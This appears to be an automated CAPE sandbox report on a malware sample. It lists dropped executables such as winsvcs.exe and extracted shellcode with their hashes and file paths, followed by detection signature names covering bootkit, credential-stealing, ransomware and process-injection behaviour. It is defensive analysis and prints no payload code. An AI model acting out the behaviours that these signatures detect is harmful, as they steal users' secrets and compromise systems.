No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\495060393034060\winsvcs.exe
File Size 152576 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 44a81be517e01ab33abdba541a239b6e
SHA1 2890c3be34e4189fe0a11b4e60ff2b3203fcdd2a
SHA256 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
CRC32 3328869D
Ssdeep 3072:MupWc+2g2yM2BSwgtNSGv551zDb/Wvn006luxHE:MupxMcBDSGlzDbuvn00c
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 3180725230.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 2910f240138e190e7909b166df3698dc
SHA1 3c4ce87d71fe2ff5c5482017317105d516a8f8e0
SHA256 a4cff3dfa592efc374054229cef177964b410a8b51646aee5e2a44c6c946e2c3
CRC32 736321C4
Ssdeep 6:idqmVg3F+X32QdGRcOkctC6h1p+21/Jt/nSeUyp+El:eNGSGQdG2T6h1saJ1SeUyn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name 3895820593.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1c2cd2dbb035e97cd38f9c51ce6e6b40
SHA1 bc429685689a09fbb7eac5814899425cb0fe6322
SHA256 8c20cc2cb85cf646e618be7453c6bb7e3e4837a23013c78320feec11ab7d8383
CRC32 4EF87629
Ssdeep 6:idqgHVg3F+X32r0fRtBLRaTwa/PqkYdwWTcgWtCtQUelICPLM0S+8spF:e31GSGIRtBtgPqkYd3Tc26lIC40S+8sr
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
File name winsvcs.exe
Associated Filenames
C:\Windows\806084767800850\winsvcs.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Download Download ZIP Submit file
Type Extracted Shellcode
Size 205410 bytes
Virtual Address 0x4f0000
Process BdTTBslVE5X4r.exe
PID 2952
Path C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
MD5 883ebc589353652b1c425eb3afff1a95
SHA1 af02e7c258cd81420cfe7824f221075eba01d83e
SHA256 9277a8a8e9c09dcd10a00e67604c3bd6aa84ad150ac73d3d292367e2c0158b40
CRC32 D48A4079
Ssdeep 1536:1YpguYxm1HYviUJmS5b/eFvn00ctHxfuVl6vUc+9xZ0f3:nCHY0Cb/Wvn006lu6D+/ZU3
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 32-bit executable
Size 156160 bytes
Virtual Address 0x400000
Process BdTTBslVE5X4r.exe
PID 2952
Path C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
MD5 dcad1d94c50b383ba2ec46c2c38738b5
SHA1 8ad8a63d10da24639bf01d32ed7cf5f39ffd04a4
SHA256 b6ab43b7b732eda8366fcd3e5cfb96d97139d2a1b17fad3645163d197459c451
CRC32 2AFEC6DC
Ssdeep 3072:jupWc+2g2yM2BSwgxUNSGv5P1Uhb/Wvn006lutLHE:jupxMcBWSGjUhbuvn00c
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 205322 bytes
Virtual Address 0x4c0000
Process winsvcs.exe
PID 2908
Path C:\Windows\495060393034060\winsvcs.exe
MD5 023a58ac5d4a8e4aedc1a64f7f95c306
SHA1 57f4e853f1e5f6cf31670064c98b7d9b46300e10
SHA256 8ff23585693116caa99d6acbbfddd0b1ec2f05438bf40a5597b3af24557131dc
CRC32 930009DD
Ssdeep 1536:svjSZYMMBNDJsb/eFvn00ctHxfu+l6vUc+9xZ0f3:CSqdBPsb/Wvn006luFD+/ZU3
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x4f0000
Process 3895820593.exe
PID 2776
Path C:\Users\user\AppData\Local\Temp\3895820593.exe
MD5 b305c7e53d24e69055477e06e9528b93
SHA1 e5b4341a79e791148911261bf79236b06d6ca995
SHA256 3f640be0963058dce85004d0897b8c213112bde35415583c93912bf0255eea51
CRC32 C0020D85
Ssdeep 3072:CBFxL5d98qaklq3BeqVVjvFjVaGTChnsUP9DKbZ+:xLrVFehn1VDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted PE Image: 32-bit executable
Size 540672 bytes
Virtual Address 0x400000
Process 3895820593.exe
PID 2776
Path C:\Users\user\AppData\Local\Temp\3895820593.exe
MD5 336b30fc4d9468a5f8165b2ff7b1926a
SHA1 d8fde0c148038f1224bb1955712824f683395d87
SHA256 1b65f899baabe9a0fb477319161d7ca4df758bf739cb50ae3519a37ea2bf5218
CRC32 8F90A919
Ssdeep 3072:T7UpE9lqoZ/WLpwsUPt7YoD2RrySK1Fvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:T7V93ZeLpw1RD2RrySKPErMeeF3k
Yara None matched
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 206137 bytes
Virtual Address 0x600000
Process winsvcs.exe
PID 3068
Path C:\Windows\806084767800850\winsvcs.exe
MD5 6cccf05388952611ce29a9b784b8d31b
SHA1 4c12cace9a6d0a2a4e649f87a0577fa08784c036
SHA256 9d222e19277b628afcec3f3c0f8a937c67dc3806358b44b60dc28a442feab9cb
CRC32 BCF590A0
Ssdeep 1536:VwC9aaztUEJdkn+HZ8sIbPgJEl3vUcK9RZ0pT:Vwaaaz+EXkTsUPdDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x8b0000
Process 3971618177.exe
PID 2936
Path C:\Users\user\AppData\Local\Temp\3971618177.exe
MD5 12f0d35c1054bd32620f6b788bd0a1ac
SHA1 384273da26ec1e8dd79119efb13ef4ab0999d433
SHA256 488c15b5476f08c3e9aa631f425c545d7248baf98fa3451b49611804f9227aab
CRC32 3F183D21
Ssdeep 1536:2T/Khjs879o9eRic1qd3iHZ8sIbPgJDl3vUcK9RZ0pT:AEs879osMsUPADKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 206137 bytes
Virtual Address 0x5d0000
Process winsvcs.exe
PID 2744
Path C:\Windows\806084767800850\winsvcs.exe
MD5 eccbac6cfb1451551b51154cb46217a5
SHA1 48c97d765ee7adc307206de0cb1273cfa49e1a14
SHA256 d09dba796f0449568c1fd2346277c43b3319f38d1580b341a55eff06e1bf3054
CRC32 55D38406
Ssdeep 1536:+7sJCbxqBvxnt/HZ8sIbPgJ/l3vUcK9RZ0pT:k8CbxsxtGsUPADKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Type Extracted Shellcode
Size 204193 bytes
Virtual Address 0x570000
Process 1015321578.exe
PID 2612
Path C:\Users\user\AppData\Local\Temp\1015321578.exe
MD5 06e77eefead25439a36cbdc8e550cb9a
SHA1 16af922d38659643d6f8804816471de486a12bb8
SHA256 79bd61c78b2aaffd1b097bdd365e66c3209503da8b8df51d05dc85183dd1a5dc
CRC32 9E690C68
Ssdeep 1536:5l7eIk7ARnx3qHZ8sIbPgJ1l3vUcK9RZ0pT:HVkSsUPeDKbZ+
Yara
  • embedded_pe - Contains an embedded PE32 file
  • shellcode - Matched shellcode byte patterns
CAPE Yara None matched
Download Download ZIP
Sorry! No process dumps.

Comments



No comments posted

Processing ( 54.682 seconds )

  • 48.341 BehaviorAnalysis
  • 3.864 CAPE
  • 0.717 NetworkAnalysis
  • 0.71 Static
  • 0.642 Dropped
  • 0.205 TargetInfo
  • 0.096 Deduplicate
  • 0.09 TrID
  • 0.01 Strings
  • 0.005 AnalysisInfo
  • 0.001 Debug
  • 0.001 config_decoder

Signatures ( 24.29 seconds )

  • 4.973 antivm_generic_disk
  • 3.481 bootkit
  • 2.689 stealth_timeout
  • 2.304 mimics_filetime
  • 1.961 decoy_document
  • 1.82 virus
  • 1.758 reads_self
  • 1.729 stealth_file
  • 1.657 api_spamming
  • 1.578 hancitor_behavior
  • 0.072 webmail_phish
  • 0.042 secure_login_phish
  • 0.038 generic_phish
  • 0.025 network_document_http
  • 0.023 stealth_network
  • 0.02 antisandbox_sleep
  • 0.019 wscript_downloader_http
  • 0.01 antiav_detectreg
  • 0.004 malicious_dynamic_function_loading
  • 0.004 antiemu_wine_func
  • 0.004 dynamic_function_loading
  • 0.004 persistence_autorun
  • 0.004 kovter_behavior
  • 0.004 antiav_detectfile
  • 0.004 infostealer_ftp
  • 0.004 ransomware_files
  • 0.003 Doppelganging
  • 0.003 infostealer_browser_password
  • 0.003 securityxploded_modules
  • 0.003 infostealer_bitcoin
  • 0.003 infostealer_im
  • 0.003 network_torgateway
  • 0.003 ransomware_extensions
  • 0.002 exploit_getbasekerneladdress
  • 0.002 sets_autoconfig_url
  • 0.002 exploit_gethaldispatchtable
  • 0.002 antivm_vbox_libs
  • 0.002 ransomware_message
  • 0.002 antianalysis_detectreg
  • 0.002 modify_proxy
  • 0.002 browser_security
  • 0.002 infostealer_mail
  • 0.001 mimics_agent
  • 0.001 tinba_behavior
  • 0.001 disables_spdy
  • 0.001 rat_nanocore
  • 0.001 injection_createremotethread
  • 0.001 InjectionCreateRemoteThread
  • 0.001 ipc_namedpipe
  • 0.001 InjectionProcessHollowing
  • 0.001 exec_crash
  • 0.001 disables_wfp
  • 0.001 cerber_behavior
  • 0.001 injection_runpe
  • 0.001 multiple_useragents
  • 0.001 antianalysis_detectfile
  • 0.001 antivm_vbox_files
  • 0.001 antivm_vbox_keys
  • 0.001 geodo_banking_trojan
  • 0.001 bot_drive
  • 0.001 disables_browser_warn
  • 0.001 recon_checkip

Reporting ( 0.125 seconds )

  • 0.125 CompressResults
Task ID 29487
Mongo ID 5c36c01cf28488708c457046
Cuckoo release 1.3-CAPE
Delete